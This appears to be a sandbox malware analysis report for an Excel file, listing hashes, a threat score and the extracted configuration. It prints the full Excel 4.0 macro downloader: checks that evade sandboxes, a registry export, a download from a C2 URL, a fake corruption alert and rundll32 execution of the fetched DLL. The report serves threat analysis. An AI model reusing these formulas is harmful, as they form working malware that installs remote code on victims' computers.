General

  • Target

    267a6da880b87fbb3c74e8ef84f469d6795f450c

  • Size

    209KB

  • Sample

    200409-41b3rw1bqa

  • MD5

    05f0733ab9c8d500e5c8b728b73a359f

  • SHA1

    267a6da880b87fbb3c74e8ef84f469d6795f450c

  • SHA256

    0ef9ba966074be3b356f51b89df07a7b7345b694dfdf9f68b0009615d5ce28fd

  • SHA512

    458d6b15953ffda2e3e589962ffc748d12dd6a1c37e6261af3c2bc954793655d5e231e3390ab43984be7daafa0e6fb1e0d57471ca027ccb704c98037dd1a6829

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://amgdorie.online/avdv42g

Attributes
  • formulas

    =IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),) =IF(GET.WORKSPACE(14)<400, CLOSE(FALSE),) =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) =IF(GET.WORKSPACE(42),,CLOSE(TRUE)) =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE)) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\"&GET.WORKSPACE(2)&"\Excel\Security c:\users\public\1.reg /y",0,5) =WAIT(NOW()+"00:00:03") =FOPEN("c:\users\public\1.reg") =FPOS(R[-1]C, 215) =FREAD(R[-2]C, 255) =FCLOSE(R[-3]C) =FILE.DELETE("c:\users\public\1.reg") =IF(ISNUMBER(SEARCH("0001",R[-3]C)),CLOSE(FALSE),) =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://amgdorie.online/avdv42g","c:\Users\Public\bug65ef.html",0,0) =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2) =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\bug65ef.html,DllRegisterServer",0,5) =CLOSE(FALSE) WORKBOOK.HIDE("tBtNRCydwb",TRUE) GOTO(R$0C$18)

Targets

    • Target

      267a6da880b87fbb3c74e8ef84f469d6795f450c

    • Size

      209KB

    • MD5

      05f0733ab9c8d500e5c8b728b73a359f

    • SHA1

      267a6da880b87fbb3c74e8ef84f469d6795f450c

    • SHA256

      0ef9ba966074be3b356f51b89df07a7b7345b694dfdf9f68b0009615d5ce28fd

    • SHA512

      458d6b15953ffda2e3e589962ffc748d12dd6a1c37e6261af3c2bc954793655d5e231e3390ab43984be7daafa0e6fb1e0d57471ca027ccb704c98037dd1a6829

    Score
    1/10

MITRE ATT&CK Enterprise v6

Tasks